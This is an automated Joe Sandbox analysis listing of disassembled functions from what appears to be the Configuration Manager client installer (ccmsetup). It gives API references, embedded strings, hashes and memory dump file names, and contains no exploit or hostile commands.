                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005BC020
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BC0AA
                                                                                            • Part of subcall function 0060D19D: __EH_prolog3_catch.LIBCMT ref: 0060D1A4
                                                                                            • Part of subcall function 0060D19D: GetCurrentThreadId.KERNEL32 ref: 0060D205
                                                                                            • Part of subcall function 0060D19D: __CxxThrowException@8.LIBCMT ref: 0060D2EA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BC110
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BC191
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Exception@8H_prolog3_catchH_prolog3_catch_Throw
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CcmExec is not in running state. No need to stop.$Couldn't stop CcmExec service. Error 0x%x$StopCcmExec$X9m$ccmexec$pService = new CServiceControl(c_szCcmExecServiceName, 0x0020 | 0x0004)$pService->GetStatus(status)$pService->Stop()$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 533523981-2375669186
                                                                                          • Opcode ID: 1bd671d12fc2c85c3150ab2abeab76888c2e46aea44ef76370c89a46c639f29e
                                                                                          • Instruction ID: 7bf612d4434c6b5cecd8c5e0bf86f952e5422f1f50143aa610e1641b92a1a955
                                                                                          • Opcode Fuzzy Hash: 1bd671d12fc2c85c3150ab2abeab76888c2e46aea44ef76370c89a46c639f29e
                                                                                          • Instruction Fuzzy Hash: 4551C771E81319AAEB10EBA4C94EBEDBEA2BF44B14F144006F9007B3C2DBB45A00CB55
                                                                                          Function 005CE160 Relevance: 36.9, APIs: 4, Strings: 17, Instructions: 135threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005CE167
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 00603360: __EH_prolog3_catch_GS.LIBCMT ref: 00603367
                                                                                            • Part of subcall function 00603360: GetCurrentThreadId.KERNEL32 ref: 006033F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005CE1E3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005CE253
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005CE29F
                                                                                          Strings
                                                                                          • preuninstallcopysource.cpp, xrefs: 005CE28F
                                                                                          • preuninstallcopysource.cpp, xrefs: 005CE1D3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005CE29A
                                                                                          • CacheConfig.ConfigKey="Cache", xrefs: 005CE21B
                                                                                          • preuninstallcopysource.cpp, xrefs: 005CE1EB
                                                                                          • preuninstallcopysource.cpp, xrefs: 005CE25B
                                                                                          • CCopySWDSourceTask::GetCacheLocationFromWMI, xrefs: 005CE18C
                                                                                          • Location, xrefs: 005CE263
                                                                                          • spNS.Get(szCacheObject, &spCacheConfig), xrefs: 005CE249
                                                                                          • root\ccm\softmgmtagent, xrefs: 005CE1AB
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005CE24E
                                                                                          • spCacheConfig.GetString(szLocation, sCacheLocation), xrefs: 005CE295
                                                                                          • preuninstallcopysource.cpp, xrefs: 005CE2A7
                                                                                          • Failed to get cache location from WMI. Error 0x%x, xrefs: 005CE312
                                                                                          • spNS.Open(szNamespace), xrefs: 005CE1D9
                                                                                          • preuninstallcopysource.cpp, xrefs: 005CE243
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005CE1DE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CCopySWDSourceTask::GetCacheLocationFromWMI$CacheConfig.ConfigKey="Cache"$Failed to get cache location from WMI. Error 0x%x$Location$preuninstallcopysource.cpp$preuninstallcopysource.cpp$preuninstallcopysource.cpp$preuninstallcopysource.cpp$preuninstallcopysource.cpp$preuninstallcopysource.cpp$root\ccm\softmgmtagent$spCacheConfig.GetString(szLocation, sCacheLocation)$spNS.Get(szCacheObject, &spCacheConfig)$spNS.Open(szNamespace)
                                                                                          • API String ID: 3353525418-556540881
                                                                                          • Opcode ID: 8e59fb71087dbb9bb38cdba7deee32df3aa671f3d8fa88ae339ee194c90c7d4a
                                                                                          • Instruction ID: 950032d04dd449d1de88675cf7dd20e824aafceb2ce4ea32a92b22db1ee7dd6b
                                                                                          • Opcode Fuzzy Hash: 8e59fb71087dbb9bb38cdba7deee32df3aa671f3d8fa88ae339ee194c90c7d4a
                                                                                          • Instruction Fuzzy Hash: B241A4B0D812A9AADB25EBE4CD4AFAE7E65BF51B40F094049B5046B2C2C7B42A05C752
                                                                                          Function 005FB31C Relevance: 35.2, APIs: 4, Strings: 16, Instructions: 176threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005FB323
                                                                                            • Part of subcall function 006109E6: __EH_prolog3_catch.LIBCMT ref: 006109ED
                                                                                            • Part of subcall function 006109E6: EnterCriticalSection.KERNEL32(?,00000010,00619DDF,00000000,?,?,00615238,?,CCM::Utility::CcmIsInConnectedStandby,00000020,005F1472,?), ref: 006109F7
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00603360: __EH_prolog3_catch_GS.LIBCMT ref: 00603367
                                                                                            • Part of subcall function 00603360: GetCurrentThreadId.KERNEL32 ref: 006033F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FB3C2
                                                                                            • Part of subcall function 005B15E4: __EH_prolog3.LIBCMT ref: 005B15EB
                                                                                            • Part of subcall function 00577FD4: __EH_prolog3.LIBCMT ref: 00577FDB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FB462
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FB4D2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3$CurrentThread$H_prolog3_catch_$CriticalEnterH_prolog3_catchSection
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$CCM$CCM::Utility::GetClientID$CCM_Client=@$ClientID$spInstance.GetString(L"ClientID", sValue)$spNamespace.Get(L"CCM_Client=@", &spInstance)$spNamespace.Open(L"CCM", false, 0, bUseAdminLocator)
                                                                                          • API String ID: 437435487-643527026
                                                                                          • Opcode ID: 9979d61cd5980fe2c8185d2d40eb17bcb84046dcd0ab6d0e1052620db47e7904
                                                                                          • Instruction ID: bf535f027a4b0709477b88e44e0b2f8cbf55a9df7d1c9b90ab5e904885d47e01
                                                                                          • Opcode Fuzzy Hash: 9979d61cd5980fe2c8185d2d40eb17bcb84046dcd0ab6d0e1052620db47e7904
                                                                                          • Instruction Fuzzy Hash: 2761A071D45388EAEB11E7A4CA5ABEE7F75AF50704F248098F1417B2C2D7B81B08D7A1
                                                                                          Function 0057D3CB Relevance: 33.6, APIs: 4, Strings: 15, Instructions: 328threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0057D3D5
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057D590
                                                                                            • Part of subcall function 00587525: __EH_prolog3_catch_GS.LIBCMT ref: 0058752C
                                                                                            • Part of subcall function 00587525: GetCurrentThreadId.KERNEL32 ref: 005875C1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057D46F
                                                                                            • Part of subcall function 005F0DBA: TlsSetValue.KERNEL32(00000000,?,?,?,?,00000004,00571045), ref: 005F0DE1
                                                                                            • Part of subcall function 005F0DBA: lstrlenW.KERNEL32(00000000,?,?,?,?,00000004,00571045), ref: 005F0DF1
                                                                                            • Part of subcall function 005F0DBA: TlsSetValue.KERNEL32(00000000,?,?,?,?,00000004,00571045), ref: 005F0E04
                                                                                            • Part of subcall function 005F0DBA: TlsSetValue.KERNEL32(00000000,?,?,?,?,00000004,00571045), ref: 005F0E3D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057D6CD
                                                                                          Strings
                                                                                          • ccmsetup.cpp, xrefs: 0057D477
                                                                                          • CcmSetup::CopyCachedClient, xrefs: 0057D419
                                                                                          • Filesystem::File::Copy( sCachedMSI, m_sDownloadDir, 0 ), xrefs: 0057D586
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057D6C8
                                                                                          • ccmsetup.cpp, xrefs: 0057D45F
                                                                                          • client.msi, xrefs: 0057D4A3, 0057D538
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057D46A
                                                                                          • Filesystem::File::Copy( sCachedTransform, m_sDownloadDir, 0 ), xrefs: 0057D6C3
                                                                                          • ccmsetup.cpp, xrefs: 0057D580
                                                                                          • ccmsetup.cpp, xrefs: 0057D6BD
                                                                                          • Copied cached client.msi from '%s'. A new one may not be downloaded., xrefs: 0057D5F1
                                                                                          • ccmsetup.cpp, xrefs: 0057D6D9
                                                                                          • GetCachedMsiPath(sPath), xrefs: 0057D465
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057D58B
                                                                                          • ccmsetup.cpp, xrefs: 0057D59C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Value$H_prolog3_catch_$H_prolog3lstrlen
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CcmSetup::CopyCachedClient$Copied cached client.msi from '%s'. A new one may not be downloaded.$Filesystem::File::Copy( sCachedMSI, m_sDownloadDir, 0 )$Filesystem::File::Copy( sCachedTransform, m_sDownloadDir, 0 )$GetCachedMsiPath(sPath)$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$client.msi
                                                                                          • API String ID: 3809249794-3304853143
                                                                                          • Opcode ID: 7ec00732a52c43f8efa777bf0bb4cb5a88f1b393949c637e8ffd5e2288b3b725
                                                                                          • Instruction ID: 42052fa4d722c56debafc4081f406bc5933930e4934a0b8335373cc8593f3a5b
                                                                                          • Opcode Fuzzy Hash: 7ec00732a52c43f8efa777bf0bb4cb5a88f1b393949c637e8ffd5e2288b3b725
                                                                                          • Instruction Fuzzy Hash: 2FC1BF71C04249EADF10EBA8CD4ABEEBFB9BF91304F248099E145A7182CB745A05DB71
                                                                                          Function 0057A3FB Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 247threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0057A405
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005F41CA: __EH_prolog3.LIBCMT ref: 005F41D1
                                                                                            • Part of subcall function 005F4253: __EH_prolog3.LIBCMT ref: 005F425A
                                                                                            • Part of subcall function 00597B94: __EH_prolog3_catch_GS.LIBCMT ref: 00597B9E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057A52F
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057A678
                                                                                          Strings
                                                                                          • CCMAPPLYINGLANGPACKS=TRUE , xrefs: 0057A432
                                                                                          • ApplyPatchChanges failed with error 0x%x. Error text = %s, xrefs: 0057A741
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057A673
                                                                                          • ccmsetup.cpp, xrefs: 0057A668
                                                                                          • Applying client language and update pack changes. Command line: %s, xrefs: 0057A5F8
                                                                                          • PatchRepair.log, xrefs: 0057A49A
                                                                                          • No client update changes are detected per current client.msi., xrefs: 0057A6C4
                                                                                          • ccmsetup.cpp, xrefs: 0057A53B
                                                                                          • PreparePatchProperties(sPatchProperties, sTmpPatchProperties), xrefs: 0057A525
                                                                                          • Logs\, xrefs: 0057A46E
                                                                                          • ccmsetup.cpp, xrefs: 0057A684
                                                                                          • $, xrefs: 0057A738
                                                                                          • CcmSetup::ApplyPatchChanges, xrefs: 0057A4CC
                                                                                          • ccmsetup.cpp, xrefs: 0057A51F
                                                                                          • InstallPackage( sMsiFile, sLangsRepairLogFile, m_eMsiUILevel, sPatchProperties, m_uInstallRetryCount, m_uRetryTimeout, bRebootRequ, xrefs: 0057A66E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057A52A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3Thread$H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$ApplyPatchChanges failed with error 0x%x. Error text = %s$Applying client language and update pack changes. Command line: %s$CCMAPPLYINGLANGPACKS=TRUE $CcmSetup::ApplyPatchChanges$InstallPackage( sMsiFile, sLangsRepairLogFile, m_eMsiUILevel, sPatchProperties, m_uInstallRetryCount, m_uRetryTimeout, bRebootRequ$Logs\$No client update changes are detected per current client.msi.$PatchRepair.log$PreparePatchProperties(sPatchProperties, sTmpPatchProperties)$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$$
                                                                                          • API String ID: 1940058678-735209606
                                                                                          • Opcode ID: d6576c952ce216dff58b746c8ed07ca2552c299788bcfd156b51a740d3689d61
                                                                                          • Instruction ID: 1e03be775a65c7cb62a3695fc393af132bb5e4aa5b43f01417316f692a8f731f
                                                                                          • Opcode Fuzzy Hash: d6576c952ce216dff58b746c8ed07ca2552c299788bcfd156b51a740d3689d61
                                                                                          • Instruction Fuzzy Hash: A8A17B71C04248EADF21EBA4CD49BEEBFB9AF52304F148099B405B7182DB745E48DF61
                                                                                          Function 005BC40E Relevance: 33.4, APIs: 3, Strings: 16, Instructions: 188threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005BC415
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BC50C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BC56A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$0&l$0&l$CcmUtilLib::CcmHashFileContent( sFilePath.c_str(), dwHashAlg, baBuffer)$File '%s' doesn't exist.$File '%s' with hash '%s' from manifest doesn't match with the file hash '%s'$HexBinaryEncode(baBuffer.getBuffer(), baBuffer.size(), &csHash)$PCm$Validated file '%s' hash '%s'$VerifyFileHash$t)l$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 3454896115-3347796439
                                                                                          • Opcode ID: 55e8654a5cddf8352cea48451166c0244718ab8bac4e495d8fca46a4c5a9c09c
                                                                                          • Instruction ID: 92ede17f5ca5e5032d06d2fd29ed94e3c269b29d4fb42d88e5f55f8d1b139464
                                                                                          • Opcode Fuzzy Hash: 55e8654a5cddf8352cea48451166c0244718ab8bac4e495d8fca46a4c5a9c09c
                                                                                          • Instruction Fuzzy Hash: 2261AF71D00249ABDF10DFA4C989BEE7FB6BF45705F14405AF400AB282DB74AE05CBA5
                                                                                          Function 00656349 Relevance: 33.4, APIs: 5, Strings: 14, Instructions: 152threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00656350
                                                                                            • Part of subcall function 00656CC3: __EH_prolog3_catch_GS.LIBCMT ref: 00656CCA
                                                                                            • Part of subcall function 00656CC3: GetCurrentThreadId.KERNEL32 ref: 00656D51
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00656407
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0065646B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006564CB
                                                                                          • CoTaskMemFree.OLE32(?,00000000,0089BF10,00000000,?,00000000,00000000,00000000,?,?,00000000,000000FF,CCM::Authentication::CCMGetCurrentCertID,0000002C,0057BB56,?), ref: 0065654B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$FreeH_prolog3_catchH_prolog3_catch_Task
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$0&l$Bytes2ComString(pbHash, dwHashLen, &szCertHash)$CCM::Authentication::CCMGetCurrentCertID$dwHashLen > 0$pbHash != 0
                                                                                          • API String ID: 2843625893-523668744
                                                                                          • Opcode ID: 74edf25e67eae87d62514a3cae1183c2989407fad2a6ab4f727155b828a24568
                                                                                          • Instruction ID: 90b499044a56763a0bf1bbea5c02d5b30849b3e82cd6c8844f7ff7b8d2c85bad
                                                                                          • Opcode Fuzzy Hash: 74edf25e67eae87d62514a3cae1183c2989407fad2a6ab4f727155b828a24568
                                                                                          • Instruction Fuzzy Hash: BF512870944259AADF00EBA4CC49BFEBEB5BF54700F548059F509B73C2CB788A09CB91
                                                                                          Function 006343A8 Relevance: 33.4, APIs: 5, Strings: 14, Instructions: 118threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_memcmp
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmCtl.cpp$..\CcmCtl.cpp$..\CcmCtl.cpp$..\CcmCtl.cpp$..\CcmCtl.cpp$..\CcmCtl.cpp$0 != pCertContext$0 != pSmsCtlContext$CcmGetCertificateContextProperty( pCertContext, 3, sBuff )$CcmUtilLib::CcmIsAllowedCA$t)l
                                                                                          • API String ID: 2894245241-1178042605
                                                                                          • Opcode ID: 98d78e5524a89c5f6b6145ffa1f4cd0413571f059189e5d9580b94fc83288ef3
                                                                                          • Instruction ID: 0cde7437d75d80868a482e451adb0e6401d09da40c3adbe7a9bbb57b38aeea30
                                                                                          • Opcode Fuzzy Hash: 98d78e5524a89c5f6b6145ffa1f4cd0413571f059189e5d9580b94fc83288ef3
                                                                                          • Instruction Fuzzy Hash: B041B771A80359AACB10DFA4C84AFBDFEA6EF14B10F144029FA04B7382CB745A0587D0
                                                                                          Function 005F60BC Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 102threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005F60C3
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,CCM::Utility::String::toAnsi,00000010,00627469,?,?,00000000,00000000,00000000), ref: 005F60F2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F6126
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F618B
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000,00000000), ref: 005F61AC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F61E2
                                                                                          Strings
                                                                                          • (szAnsi.resize(uLength) == true) != 0, xrefs: 005F6181
                                                                                          • ..\String.cpp, xrefs: 005F6116
                                                                                          • ..\String.cpp, xrefs: 005F6193
